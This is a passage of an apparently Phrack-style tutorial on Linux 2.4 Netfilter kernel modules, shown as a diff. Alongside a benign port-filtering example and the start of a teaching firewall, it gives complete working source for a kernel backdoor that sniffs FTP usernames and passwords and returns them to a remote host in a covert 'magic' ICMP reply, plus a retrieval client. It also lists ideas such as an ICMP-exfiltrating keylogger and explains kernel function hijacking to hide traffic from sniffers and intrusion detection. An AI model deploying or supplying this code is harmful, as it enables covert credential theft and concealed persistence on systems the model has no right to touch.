+would help.  Listing 5 presents code to check if the destination TCP port
+of a packet matches some  port we want to drop all  packets for.  As with
+listing 3, this was taken from LWFW.
+
+Listing 5. Checking the TCP destination port of a received packet
+          unsigned char *deny_port = "\x00\x19";   /* port 25 */
+
+	  ...
+
+          static int check_tcp_packet(struct sk_buff *skb)
+          {
+              struct tcphdr *thead;
+
+              /* We don't want any NULL pointers in the chain
+	       * to the IP header. */
+              if (!skb ) return NF_ACCEPT;
+              if (!(skb->nh.iph)) return NF_ACCEPT;
+
+              /* Be sure this is a TCP packet first */
+              if (skb->nh.iph->protocol != IPPROTO_TCP) {
+                  return NF_ACCEPT;
+              }
+
+              thead = (struct tcphdr *)(skb->data +
+                                       (skb->nh.iph->ihl * 4));
+
+              /* Now check the destination port */
+              if ((thead->dest) == *(unsigned short *)deny_port) {
+                  return NF_DROP;
+              }
+          
+	      return NF_ACCEPT;
+          }
+
+Very simple indeed. Don't forget that for this function to work deny_port
+should be in network byte order.  That's it for packet filtering  basics,
+you should have a fair understanding of how to get to the information you
+want for a specific packet.  Now it's time to move onto more  interesting
+stuff.
+
+
+--[ 5 - Other possibilities for Netfilter hooks
+
+Here I'll  make some  proposals for  other cool stuff to do with Netfilter
+hooks. Section 5.1 will simply provide food for thought, while section 5.2
+shall  discuss and  provide working code for a kernel based  FTP  password
+sniffer with  remote password  retrieval that really does work. It fact it
+works so well it scares me, and I wrote it.
+
+----[ 5.1 - Hidden backdoor daemons
+
+Kernel module  programming would have  to be one  of the  most interesting
+areas of development for Linux.  Writing code in the kernel means  you are
+writing code in a place  where you are  limited only by  your imagination.
+From a malicous point of  view you can  hide files,  processes, and do all
+sorts of cool things that  any  rootkit worth its salt is capable of. Then
+from a not-so-malicious point of view (yes people  with this point of view
+do exist) you can hide  files,  processes and do all sorts of cool things.
+The kernel really is a fascinating place.
+
+Now with all the power made available to a kernel level  programmer, there
+are  a lot of possibilities.  Possibly one  of the most  interesting  (and
+scary for  system  administrators) is  the possibility of backdoors  built
+right into the kernel.  Afterall, if a  backdoor doesn't  run as a process
+then how do you know it's running? Of course there are ways of making your
+kernel  cough-up  such backdoors,  but they are by  no means  as easy  and
+simple as running ps.  Now the idea of putting backdoor code into a kernel
+is not new.  What I'm proposing  here, however, is placing  simple network
+services as kernel backdoors using, you guessed it, Netfilter hooks.
+
+If  you have the  necessary skills and willingness to crash your kernel in
+the name of experimentation,  then you can  construct  simple  but  useful
+network services located  entirely in the  kernel and accessible remotely.
+Basically a  Netfilter  hook could  watch incoming  packets  for a "magic"
+packet  and  when  that magic packet  is received,  do something  special.
+Results can then be sent from the Netfilter hook and the hook function can
+return NF_STOLEN so that the received "magic" packet goes no further. Note
+however, that when sending in such a fassion, outgoing packets will  still
+be visible on the outbound Netfilter hooks. Therefore userspace is totally
+unaware  that  the magic  packet  ever  arrived, but they  can  still  see
+whatever you send out. Beware! Just because a sniffer on a compromised host
+can't see the packet, doesn't mean that a sniffer  on an intermediate host
+can't see the packet.
+
+kossak  and  lifeline wrote an excellent article for Phrack describing how
+such things could  be done by registering  packet  type handlers. Although
+this document deals with  Netfilter  hooks I still  suggest reading  their
+article  (Issue 55, file 12)  as it is a very  interesting  read with some
+very interesting ideas being presented.
+
+So what kind of work  could a  backdoor  Netfilter hook do? Well, here are
+some suggestions:
+  -- Remote access key-logger. Module logs keystrokes and results are
+     sent to a remote host when that host sends a PING request. So a
+     stream of keystroke information could be made to look like a steady
+     (don't flood) stream of PING replies. Of course one would want to
+     implement a simple encryption so that ASCII keys don't show
+     themselves immediately and some alert system administrator goes
+     "Hang on. I typed that over my SSH session before! Oh $%@T%&!".
+  -- Various simple administration tasks such as getting lists of who is
+     currently logged onto the machine or obtaining information about
+     open network connections.
+  -- Not really a backdoor as such, but a module that sits on a network
+     perimeter and blocks any traffic suspected to come from trojans,
+     ICMP covert channels or file sharing tools like KaZaa.
+  -- File transfer "server". I have implemented this idea recently. The
+     resulting LKM is hours of fun :).
+  -- Packet bouncer. Redirects packets aimed at a special port on the
+     backdoored host to another IP host and port and sends packets from
+     that host back to the initiator. No process being spawned and best of
+     all, no network socket being opened.
+  -- Packet bouncer as described above used to communicate with critical
+     systems on a network in a semi-covert manner. Eg. configuring routers
+     and such.
+  -- FTP/POP3/Telnet password sniffer. Sniff outgoing passwords and save
+     the information until a magic packet comes in asking for it.
+
+Well that's a short list of ideas.  The last one will actually  be discussed
+in more detail in the next section as it provides a nice oppurtunity to look
+at some more functions internal to the kernel's network code.
+
+----[ 5.2 - Kernel based FTP password sniffer
+
+Presented here is a simple proof-of-concept module that acts as a Netfilter
+backdoor. This module will sniff  outgoing FTP packets  looking for a  USER
+and  PASS command pair for an FTP server.  When a pair is  found the module
+will then wait for  a "magic" ICMP ECHO (Ping) packet big  enough to return
+the server's IP  address and the username and password.  Also provided is a
+quick hack that sends a magic packet, gets a reply then prints the returned
+information. Once a username/password pair has been read from the module it
+will then look for the next pair. Note that only one pair will be stored by
+the module at one time.  Now that a brief overview  has been provided, it's
+time to present a more detailed look at how the module does its thing.
+
+When loaded,  the module's  init_module()  function  simply  registers  two
+Netfilter  hooks.  The  first  one is used  to watch  incoming  traffic (on
+NF_IP_PRE_ROUTING)  in an attempt  to find a "magic" ICMP packet.  The next
+one is used  to watch  traffic leaving the machine  (on NF_IP_POST_ROUTING)
+the  module is installed on.  This is where the search  and capture of  FTP
+USER  and  PASS  packets happens.  The  cleanup_module()  procedure  simply
+unregisters these two hooks.
+
+watch_out()  is the  function used to hook  NF_IP_POST_ROUTING.  Looking at
+this  function  you can see  that it is very  simple  in operation.  When a
+packet enters the function it is run through various checks to be sure it's
+an  FTP  packet.  If it's not  then a  value  of   NF_ACCEPT   is  returned
+immediately.  If it is an FTP packet then the module checks to be sure that
+it doesn't already have a username and password pair already queued.  If it
+does (as signalled by have_pair being non-zero) then  NF_ACCEPT is returned
+and the packet can  finally leave the system.  Otherwise,  the  check_ftp()
+procedure is called.  This is where  extraction of passwords actually takes
+place.  If no previous packets  have been received then the  target_ip  and
+target_port variables should be cleared.
+
+check_ftp()  starts by looking for either  "USER",  "PASS" or "QUIT" at the
+beginning of the packet.  Note that  PASS commands  will not  be  processed
+until a USER command has been processed. This prevents deadlock that occurs
+if for  some reason  a PASS command  is received first  and the  connection
+breaks before  USER arrives.  Also, if a  QUIT  command arrives  and only a
+username has been captured then things are reset so sniffing can start over
+on a new connection. When a USER or PASS command arrives, if the  necessary
+sanity checks are passed then the argument  to the command  is copied. Just
+before check_ftp() finishes under normal operations, it checks to see if it
+now has a valid username and password string. If it does then  have_pair is
+set and no more  usernames or  passwords will be grabbed  until the current
+pair is retrieved.
+
+So far you have seen how this module installs itself and begins looking for
+usernames  and passwords  to log.  Now you  shall see what happens when the
+specially  formatted "magic" packet arrives.  Pay particular attention here
+because this is where the most problems arose during development. 16 kernel
+faults if I remember correctly :).  When packets come into the machine with
+this module installed, watch_in() checks each one  to see if it is a  magic
+packet.  If it does not pass  the necessary  requirements to be  considered
+magic,  then  the  packet  is  ignored by  watch_in()  who  simply  returns
+NF_ACCEPT.  Notice how one of the  criteria for  magic packets is that they
+have enough room  to hold the IP address and username and password strings.
+This is done to make sending the reply easier.  A fresh sk_buff  could have
+been allocated,  but getting  all of the  necessary  fields  right  can  be
+difficult  and you  have to  get them right!  So instead of  creating a new
+structure for  our reply  packet, we  simply  tweak  the  request  packet's
+structure.  To  return the  packet successfully, several changes need to be
+made.  Firstly, the  IP addresses  are swapped  around and  the packet type
+field of the  sk_buff  structure (pkt_type)  is changed to  PACKET_OUTGOING
+which is defined in  linux/if_packet.h.  The next thing to take  care of is
+making sure any link  layer  headers are included.  The data  field of  our
+received packet's sk_buff points after the  link layer header and it is the
+data field that points to the beginning of  packet data to be  transmitted.
+So for interfaces that require the link layer header (Ethernet and Loopback
+Point-to-Point is raw) we  point the  data field  to the  mac.ethernet  or
+mac.raw structures. To determine what type of interface this packet came in
+on, you can check  the value of  sb->dev->type  where  sb is a pointer to a
+sk_buff  structure.   Valid  values  for  this   field   can  be  found  in
+linux/if_arp.h but the most useful are given below in table 3.
+
+Table 3: Common values for interface types
+
+Type Code        Interface Type
+ARPHRD_ETHER     Ethernet
+ARPHRD_LOOPBACK  Loopback device
+ARPHRD_PPP       Point-to-point (eg. dialup)
+
+The last thing to be done is actually copy the data we want to send in our
+reply.  It's now time to send the packet.  The  dev_queue_xmit()  function
+takes a pointer to a sk_buff structure as it's only argument and returns a
+negative errno  code on a nice  failure.  What do I  mean by nice failure?
+Well, if you give dev_queue_xmit() a badly constructed socket buffer  then
+you will get a  not-so-nice  failure.  One that comes complete with kernel
+fault and kernel stack dump information. See how failures can be splt into
+two groups here? Finally, watch_in() returns  NF_STOLEN to tell  Netfilter
+to forget it ever saw the packet (bit of a Jedi Mind Trick). Do NOT return
+NF_DROP  if you have  called  dev_queue_xmit()!  If you do  then you  will
+quickly get a nasty kernel fault.  This is because  dev_queue_xmit()  will
+free the passed in socket buffer and Netfilter will attempt to do the same
+with an NF_DROPped packet. Well that's enough discussion on the code, it's
+now time to actually see the code.
+
+
+------[ 5.2.1 - The code... nfsniff.c
+
+<++> nfsniff/nfsniff.c
+/* Simple proof-of-concept for kernel-based FTP password sniffer.
+ * A captured Username and Password pair are sent to a remote host
+ * when that host sends a specially formatted ICMP packet. Here we
+ * shall use an ICMP_ECHO packet whose code field is set to 0x5B
+ * *AND* the packet has enough
+ * space after the headers to fit a 4-byte IP address and the
+ * username and password fields which are a max. of 15 characters
+ * each plus a NULL byte. So a total ICMP payload size of 36 bytes. */
+
+ /* Written by bioforge,  March 2003 */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/skbuff.h>
+#include <linux/in.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/icmp.h>
+#include <linux/netdevice.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter_ipv4.h>
+#include <linux/if_arp.h>
+#include <linux/if_ether.h>
+#include <linux/if_packet.h>
+
+#define MAGIC_CODE   0x5B
+#define REPLY_SIZE   36
+
+#define ICMP_PAYLOAD_SIZE  (htons(sb->nh.iph->tot_len) \
+			       - sizeof(struct iphdr) \
+			       - sizeof(struct icmphdr))
+
+/* THESE values are used to keep the USERname and PASSword until
+ * they are queried. Only one USER/PASS pair will be held at one
+ * time and will be cleared once queried. */
+static char *username = NULL;
+static char *password = NULL;
+static int  have_pair = 0;	 /* Marks if we already have a pair */
+
+/* Tracking information. Only log USER and PASS commands that go to the
+ * same IP address and TCP port. */
+static unsigned int target_ip = 0;
+static unsigned short target_port = 0;
+
+/* Used to describe our Netfilter hooks */
+struct nf_hook_ops  pre_hook;	       /* Incoming */
+struct nf_hook_ops  post_hook;	       /* Outgoing */
+
+
+/* Function that looks at an sk_buff that is known to be an FTP packet.
+ * Looks for the USER and PASS fields and makes sure they both come from
+ * the one host as indicated in the target_xxx fields */
+static void check_ftp(struct sk_buff *skb)
+{
+   struct tcphdr *tcp;
+   char *data;
+   int len = 0;
+   int i = 0;
+   
+   tcp = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
+   data = (char *)((int)tcp + (int)(tcp->doff * 4));
+
+   /* Now, if we have a username already, then we have a target_ip.
+    * Make sure that this packet is destined for the same host. */
+   if (username)
+     if (skb->nh.iph->daddr != target_ip || tcp->source != target_port)
+       return;
+   
+   /* Now try to see if this is a USER or PASS packet */
+   if (strncmp(data, "USER ", 5) == 0) {          /* Username */
+      data += 5;
+      
+      if (username)  return;
+      
+      while (*(data + i) != '\r' && *(data + i) != '\n'
+	     && *(data + i) != '\0' && i < 15) {
+	 len++;
+	 i++;
+      }
+      
+      if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
+	return;
+      memset(username, 0x00, len + 2);
+      memcpy(username, data, len);
+      *(username + len) = '\0';	       /* NULL terminate */
+   } else if (strncmp(data, "PASS ", 5) == 0) {   /* Password */
+      data += 5;
+
+      /* If a username hasn't been logged yet then don't try logging
+       * a password */
+      if (username == NULL) return;
+      if (password)  return;
+      
+      while (*(data + i) != '\r' && *(data + i) != '\n'
+	     && *(data + i) != '\0' && i < 15) {
+	 len++;
+	 i++;
+      }
+
+      if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
+	return;
+      memset(password, 0x00, len + 2);
+      memcpy(password, data, len);
+      *(password + len) = '\0';	       /* NULL terminate */
+   } else if (strncmp(data, "QUIT", 4) == 0) {
+      /* Quit command received. If we have a username but no password,
+       * clear the username and reset everything */
+      if (have_pair)  return;
+      if (username && !password) {
+	 kfree(username);
+	 username = NULL;
+	 target_port = target_ip = 0;
+	 have_pair = 0;
+	 
+	 return;
+      }
+   } else {
+      return;
+   }
+
+   if (!target_ip)
+     target_ip = skb->nh.iph->daddr;
+   if (!target_port)
+     target_port = tcp->source;
+
+   if (username && password)
+     have_pair++;		       /* Have a pair. Ignore others until
+					* this pair has been read. */
+//   if (have_pair)
+//     printk("Have password pair!  U: %s   P: %s\n", username, password);
+}
+
+/* Function called as the POST_ROUTING (last) hook. It will check for
+ * FTP traffic then search that traffic for USER and PASS commands. */
+static unsigned int watch_out(unsigned int hooknum,
+			      struct sk_buff **skb,
+			      const struct net_device *in,
+			      const struct net_device *out,
+			      int (*okfn)(struct sk_buff *))
+{
+   struct sk_buff *sb = *skb;
+   struct tcphdr *tcp;
+   
+   /* Make sure this is a TCP packet first */
+   if (sb->nh.iph->protocol != IPPROTO_TCP)
+     return NF_ACCEPT;		       /* Nope, not TCP */
+   
+   tcp = (struct tcphdr *)((sb->data) + (sb->nh.iph->ihl * 4));
+   
+   /* Now check to see if it's an FTP packet */
+   if (tcp->dest != htons(21))
+     return NF_ACCEPT;		       /* Nope, not FTP */
+   
+   /* Parse the FTP packet for relevant information if we don't already
+    * have a username and password pair. */
+   if (!have_pair)
+     check_ftp(sb);
+   
+   /* We are finished with the packet, let it go on its way */
+   return NF_ACCEPT;
+}
+
+
+/* Procedure that watches incoming ICMP traffic for the "Magic" packet.
+ * When that is received, we tweak the skb structure to send a reply
+ * back to the requesting host and tell Netfilter that we stole the
+ * packet. */
+static unsigned int watch_in(unsigned int hooknum,
+			     struct sk_buff **skb,
+			     const struct net_device *in,
+			     const struct net_device *out,
+			     int (*okfn)(struct sk_buff *))
+{
+   struct sk_buff *sb = *skb;
+   struct icmphdr *icmp;
+   char *cp_data;		       /* Where we copy data to in reply */
+   unsigned int   taddr;	       /* Temporary IP holder */
+
+   /* Do we even have a username/password pair to report yet? */
+   if (!have_pair)
+     return NF_ACCEPT;
+     
+   /* Is this an ICMP packet? */
+   if (sb->nh.iph->protocol != IPPROTO_ICMP)
+     return NF_ACCEPT;
+   
+   icmp = (struct icmphdr *)(sb->data + sb->nh.iph->ihl * 4);
+
+   /* Is it the MAGIC packet? */
+   if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO
+     || ICMP_PAYLOAD_SIZE < REPLY_SIZE) {
+      return NF_ACCEPT;
+   }
+   
+   /* Okay, matches our checks for "Magicness", now we fiddle with
+    * the sk_buff to insert the IP address, and username/password pair,
+    * swap IP source and destination addresses and ethernet addresses
+    * if necessary and then transmit the packet from here and tell
+    * Netfilter we stole it. Phew... */
+   taddr = sb->nh.iph->saddr;
+   sb->nh.iph->saddr = sb->nh.iph->daddr;
+   sb->nh.iph->daddr = taddr;
+
+   sb->pkt_type = PACKET_OUTGOING;
+
+   switch (sb->dev->type) {
+    case ARPHRD_PPP:		       /* No fiddling needs doing */
+      break;
+    case ARPHRD_LOOPBACK:
+    case ARPHRD_ETHER:
+	{
+	   unsigned char t_hwaddr[ETH_ALEN];
+	   
+	   /* Move the data pointer to point to the link layer header */
+	   sb->data = (unsigned char *)sb->mac.ethernet;
+	   sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet);
+	   memcpy(t_hwaddr, (sb->mac.ethernet->h_dest), ETH_ALEN);
+	   memcpy((sb->mac.ethernet->h_dest), (sb->mac.ethernet->h_source),
+		  ETH_ALEN);
+	   memcpy((sb->mac.ethernet->h_source), t_hwaddr, ETH_ALEN);
+  
+	   break;
+	}
+   };
+ 
+   /* Now copy the IP address, then Username, then password into packet */
+   cp_data = (char *)((char *)icmp + sizeof(struct icmphdr));
+   memcpy(cp_data, &target_ip, 4);
+   if (username)
+     memcpy(cp_data + 4, username, 16);
+   if (password)
+     memcpy(cp_data + 20, password, 16);
+   
+   /* This is where things will die if they are going to.
+    * Fingers crossed... */
+   dev_queue_xmit(sb);
+
+   /* Now free the saved username and password and reset have_pair */
+   kfree(username);
+   kfree(password);
+   username = password = NULL;
+   have_pair = 0;
+   
+   target_port = target_ip = 0;
+
+//   printk("Password retrieved\n");
+   
+   return NF_STOLEN;
+}
+
+int init_module()
+{
+   pre_hook.hook     = watch_in;
+   pre_hook.pf       = PF_INET;
+   pre_hook.priority = NF_IP_PRI_FIRST;
+   pre_hook.hooknum  = NF_IP_PRE_ROUTING;
+   
+   post_hook.hook     = watch_out;
+   post_hook.pf       = PF_INET;
+   post_hook.priority = NF_IP_PRI_FIRST;
+   post_hook.hooknum  = NF_IP_POST_ROUTING;
+   
+   nf_register_hook(&pre_hook);
+   nf_register_hook(&post_hook);
+   
+   return 0;
+}
+
+void cleanup_module()
+{
+   nf_unregister_hook(&post_hook);
+   nf_unregister_hook(&pre_hook);
+   
+   if (password)
+     kfree(password);
+   if (username)
+     kfree(username);
+}
+<-->
+
+------[ 5.2.2 - getpass.c
+
+<++> nfsniff/getpass.c
+/* getpass.c - simple utility to get username/password pair from
+ * the Netfilter backdoor FTP sniffer. Very kludgy, but effective.
+ * Mostly stripped from my source for InfoPig.
+ *
+ * Written by bioforge  -  March 2003 */
+
+#include <sys/types.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+
+#ifndef __USE_BSD
+# define __USE_BSD		       /* We want the proper headers */
+#endif
+# include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+
+/* Function prototypes */
+static unsigned short checksum(int numwords, unsigned short *buff);
+
+int main(int argc, char *argv[])
+{
+    unsigned char dgram[256];	       /* Plenty for a PING datagram */
+    unsigned char recvbuff[256];
+    struct ip *iphead = (struct ip *)dgram;
+    struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip));
+    struct sockaddr_in src;
+    struct sockaddr_in addr;
+    struct in_addr my_addr;
+    struct in_addr serv_addr;
+    socklen_t src_addr_size = sizeof(struct sockaddr_in);
+    int icmp_sock = 0;
+    int one = 1;
+    int *ptr_one = &one;
+    
+    if (argc < 3) {
+	fprintf(stderr, "Usage:  %s remoteIP myIP\n", argv[0]);
+	exit(1);
+    }
+
+    /* Get a socket */
+    if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
+	fprintf(stderr, "Couldn't open raw socket! %s\n",
+		strerror(errno));
+	exit(1);
+    }
+
+    /* set the HDR_INCL option on the socket */
+    if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL,
+		  ptr_one, sizeof(one)) < 0) {
+	close(icmp_sock);
+	fprintf(stderr, "Couldn't set HDRINCL option! %s\n",
+	        strerror(errno));
+	exit(1);
+    }
+    
+    addr.sin_family = AF_INET;
+    addr.sin_addr.s_addr = inet_addr(argv[1]);
+    
+    my_addr.s_addr = inet_addr(argv[2]);
+    
+    memset(dgram, 0x00, 256);
+    memset(recvbuff, 0x00, 256);
+    
+    /* Fill in the IP fields first */
+    iphead->ip_hl  = 5;
+    iphead->ip_v   = 4;
+    iphead->ip_tos = 0;
+    iphead->ip_len = 84;
+    iphead->ip_id  = (unsigned short)rand();
+    iphead->ip_off = 0;
+    iphead->ip_ttl = 128;
+    iphead->ip_p   = IPPROTO_ICMP;
+    iphead->ip_sum = 0;
+    iphead->ip_src = my_addr;
+    iphead->ip_dst = addr.sin_addr;
+    
+    /* Now fill in the ICMP fields */
+    icmphead->icmp_type = ICMP_ECHO;
+    icmphead->icmp_code = 0x5B;
+    icmphead->icmp_cksum = checksum(42, (unsigned short *)icmphead);
+    
+    /* Finally, send the packet */
+    fprintf(stdout, "Sending request...\n");
+    if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr,
+	       sizeof(struct sockaddr)) < 0) {
+	fprintf(stderr, "\nFailed sending request! %s\n",
+		strerror(errno));
+	return 0;
+    }
+
+    fprintf(stdout, "Waiting for reply...\n");
+    if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src,
+		 &src_addr_size) < 0) {
+	fprintf(stdout, "Failed getting reply packet! %s\n",
+		strerror(errno));
+	close(icmp_sock);
+	exit(1);
+    }
+	
+    iphead = (struct ip *)recvbuff;
+    icmphead = (struct icmp *)(recvbuff + sizeof(struct ip));
+    memcpy(&serv_addr, ((char *)icmphead + 8),
+    	   sizeof (struct in_addr));
+    
+    fprintf(stdout, "Stolen for ftp server %s:\n", inet_ntoa(serv_addr));
+    fprintf(stdout, "Username:    %s\n",
+	     (char *)((char *)icmphead + 12));
+    fprintf(stdout, "Password:    %s\n",
+	     (char *)((char *)icmphead + 28));
+    
+    close(icmp_sock);
+    
+    return 0;
+}
+
+/* Checksum-generation function. It appears that PING'ed machines don't
+ * reply to PINGs with invalid (ie. empty) ICMP Checksum fields...
+ * Fair enough I guess. */
+static unsigned short checksum(int numwords, unsigned short *buff)
+{
+   unsigned long sum;
+   
+   for(sum = 0;numwords > 0;numwords--)
+     sum += *buff++;   /* add next word, then increment pointer */
+   
+   sum = (sum >> 16) + (sum & 0xFFFF);
+   sum += (sum >> 16);
+   
+   return ~sum;
+}
+<-->
+
+
+--[ 6 - Hiding network traffic from Libpcap
+
+   This section will briefly describe how the Linux 2.4 kernel
+ can be hacked to make network traffic that matches predefined
+ conditions invisible to packet  sniffing software  running on
+ the local machine.  Presented at the  end of  this article is
+ working  code that will  do such a thing for all IPv4 traffic
+ coming from or  going to a particular  IP address.  So  let's
+ get started shall we...
+ 
+----[ 6.1 - SOCK_PACKET, SOCK_RAW and Libpcap
+
+   Some of the most useful software for a system administrator
+ is that which  can be classified  under the  broad  title  of
+ "packet sniffer".  Two of the most common examples of general
+ purpose packet sniffers are  tcpdump(1) and Ethereal(1). Both
+ of these applications utilise the Libpcap library  (available
+ from [1] along with tcpdump) to capture raw packets.  Network
+ Intrusion  Detection  Systems  (NIDS)  also  make  use of the
+ Libpcap library.  SNORT requires Libpcap, as does  Libnids, a
+ NIDS  writing  library that  provides  IP  reassembly and TCP
+ stream following and is available from [2].
+ 
+   On Linux systems, the Libpcap library uses the  SOCK_PACKET
+ interface.  Packet sockets  are special  sockets  that can be
+ used to send and receive raw packets at the link layer. There
+ is a lot that can be said about packet sockets and their use.
+ However, because this  section is about  hiding from them and
+ not using them,  the interested  reader is  directed  to  the
+ packet(7) man page.  For the  discussion  here,  it  is  only
+ neccessary to understand that packet sockets are what Libpcap
+ applications use to get the information on raw packets coming
+ into or going out of the machine.
+ 
+   When a packet is received by the kernel's network  stack, a
+ check is  performed to see  if there  are any packet  sockets
+ that would be  interested in this packet.  If there  are then
+ the packet is delivered to those interested sockets.  If not,
+ the packet simply  continues on it's  way to the  TCP, UDP or
+ other socket type that it's  truly bound for.  The same thing
+ happens for sockets  of type SOCK_RAW.  Raw sockets  are very
+ similar to packet sockets,  except they do not  provide  link
+ layer headers.  An  example of a  utility  that utilises  raw
+ IP  sockets is my SYNalert  utility, available at [3]  (sorry
+ about the shameless plug there :).
+
+   So now you  should see  that packet  sniffing  software  on
+ Linux uses the Libpcap library.  Libpcap utilises the  packet
+ socket  interface  to obtain raw  packets with link layers on
+ Linux systems.  Raw sockets  were also mentioned which act as
+ a way for user space  applications to obtain packets complete
+ with IP headers.  The next  section will  discuss how  an LKM
+ can be used to hide network traffic from these packet and raw
+ socket interfaces.
+
+
+------[ 6.2 Wrapping the cloak around the dagger
+
+   When a packet is  received and sent to a packet socket, the
+ packet_rcv() function  is called.  This function can be found
+ in  net/packet/af_packet.c.  packet_rcv() is  responsible for
+ running the  packet through any  socket  filters that  may be
+ applied  to the  destination  socket  and  then the  ultimate
+ delivery of the  packet to  user space.  To hide packets from
+ a packet  socket we need to prevent  packet_rcv()  from being
+ called  at all for certain packets.  How do we do this?  With
+ good ol'-fashioned function hijacking of course. 
+ 
+   The basic operation of  function  hijacking  is that  if we
+ know the  address of a kernel  function,  even one that's not
+ exported, we can  redirect that function to  another location
+ before  we allow  the real code to run.  To do this we  first
+ save  so  many of the  original  instruction  bytes from  the
+ beginning of the  function and replace them with  instruction
+ bytes that perform an absolute jump to our own code.  Example
+ i386 assembler to do this is given here:
+ 
+        movl  (address of our function),  %eax
+	jmp   *eax
+ 
+   The generated hex bytes of these instructions (substituting
+ zero as our function address) are:
+ 
+        0xb8 0x00 0x00 0x00 0x00
+	0xff 0xe0
+ 
+   If in the  initialisation of an LKM we  change the function
+ address  of  zero  in  the  code  above to  that of our  hook
+ function, we can make our hook function run first.  When (if)
+ we want to run  the original  function we simply  restore the
+ original bytes at the  beginning, call the function  and then
+ replace  our  hijacking code.  Simple, but  powerful.  Silvio
+ Cesare has written a  document a while  ago detailing  kernel
+ function hijacking. See [4] in the references.
+
+   Now to hide  packets from  packet  sockets we need to first
+ write the hook  function that will  check to see if a  packet
+ matches our criteria to be hidden.  If it does, then our hook
+ function simply returns zero to it's caller and  packet_rcv()
+ never  gets called.  If packet_rcv()  never gets called, then
+ the  packet is  never  delivered  to the  user  space  packet
+ socket.  Note  that it is only the *packet*  socket that this
+ packet will be dropped on.  If we want to filter FTP  packets
+ from being sent to  packet sockets then the  FTP server's TCP
+ socket will  still see the  packet.  All that  we've done  is
+ made that packet  invisible to any sniffer  software that may
+ be running on the host.  The FTP server will still be able to
+ process and log the connection.
+ 
+   In theory that's all there is too it.  The same  thing  can
+ be  done for raw  sockets as well.  The difference is that we
+ need to hook  the  raw_rcv()  function (net/ipv4/raw.c).  The
+ next  section will  present and  discuss  source  code for an
+ example LKM that will  hijack the packet_rcv() and  raw_rcv()
+ functions and hide any  packets going to or coming from an IP
+ address that we specify.
+
+
+--[ 7 - Conclusion
+
+Hopefully by now you have at least a basic understanding of what Netfilter
+is, how to use it  and what you can do with it. You should also  have  the
+knowledge to hide special network traffic from sniffing software running on
+the local machine.If you would like a tarball of the sources used for this
+tutorial then just  email me.  I  would also  appreciate any  corrections,
+comments  or suggestions. Now I leave it to you and your imagination to do
+something interesting with what I have presented here.
+
+
+--[ A - Light-Weight Fire Wall
+----[ A.1 - Overview
+
+The  Light-Weight  Fire  Wall  (LWFW)  is  a  simple  kernel  module  that
+demonstrates  the basic  packet  filtering  techniques that were presented
+in section 4.LWFW also  provides a control  interface  through the ioctl()
+system call.
+
+Because the LWFW source is  sufficiently  documented I will  only  provide
+a brief overview  of how it  works.  When the  LWFW  module  is  installed
+its  first  task  is to try and  register the  control  device.  Note that
+before the ioctl()  interface to LWFW can be used, a character device file
+needs to be made in /dev.  If the control device registration succeeds the
+"in use" marker is cleared and  the hook function for  NF_IP_PRE_ROUTE  is
+registered. The clean-up function simply does the reverse of this process.
+
+LWFW provides three basic options for dropping packets. These are, in the
+order of processing:
+  -- Source interface
+  -- Source IP address
+  -- Destination TCP port
+
+The specifics of these rules are set with the ioctl() interface.
+When a packet is received LWFW will check it against all the rules which
+have been set. If it matches any of the rules then the hook function will
+return NF_DROP and Netfilter will silently drop the packet. Otherwise
+the hook function will return NF_ACCEPT and the packet will continue
+on its way.
+
+The last thing worth mentioning is LWFW's statistics logging. Whenever a
+packet comes into the hook function and LWFW is active the total
+number of packets seen is incremented. The individual rules checking
+functions are responsible for incrementing their respective count of
+dropped packets. Note that when a rule's value is changed its count of
+dropped packets is reset to zero. The lwfwstats program utilises the
+LWFW_GET_STATS IOCTL to get a copy of the statistics structure and
+display it's contents.
+
+
+----[ A.2 - The source...  lwfw.c
+
+<++> lwfw/lwfw.c
+/* Light-weight Fire Wall. Simple firewall utility based on
+ * Netfilter for 2.4. Designed for educational purposes.
+ * 
+ * Written by bioforge  -  March 2003.
+ */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/net.h>
+#include <linux/types.h>
+#include <linux/skbuff.h>
+#include <linux/string.h>
+#include <linux/malloc.h>
+#include <linux/netdevice.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter_ipv4.h>
+#include <linux/in.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+
+#include <asm/errno.h>
+#include <asm/uaccess.h>
+
+#include "lwfw.h"
+
+/* Local function prototypes */
+static int set_if_rule(char *name);
+static int set_ip_rule(unsigned int ip);
+static int set_port_rule(unsigned short port);
+static int check_ip_packet(struct sk_buff *skb);
+static int check_tcp_packet(struct sk_buff *skb);
+static int copy_stats(struct lwfw_stats *statbuff);
+
+/* Some function prototypes to be used by lwfw_fops below. */
+static int lwfw_ioctl(struct inode *inode, struct file *file,
+		      unsigned int cmd, unsigned long arg);
+static int lwfw_open(struct inode *inode, struct file *file);
+static int lwfw_release(struct inode *inode, struct file *file);
+
+
+/* Various flags used by the module */
+/* This flag makes sure that only one instance of the lwfw device
+ * can be in use at any one time. */
+static int lwfw_ctrl_in_use = 0;
+
+/* This flag marks whether LWFW should actually attempt rule checking.
+ * If this is zero then LWFW automatically allows all packets. */
+static int active = 0;
+
+/* Specifies options for the LWFW module */
+static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE
+				    | LWFW_IP_DENY_ACTIVE
+				    | LWFW_PORT_DENY_ACTIVE);
+
+static int major = 0;		       /* Control device major number */
+
+/* This struct will describe our hook procedure. */
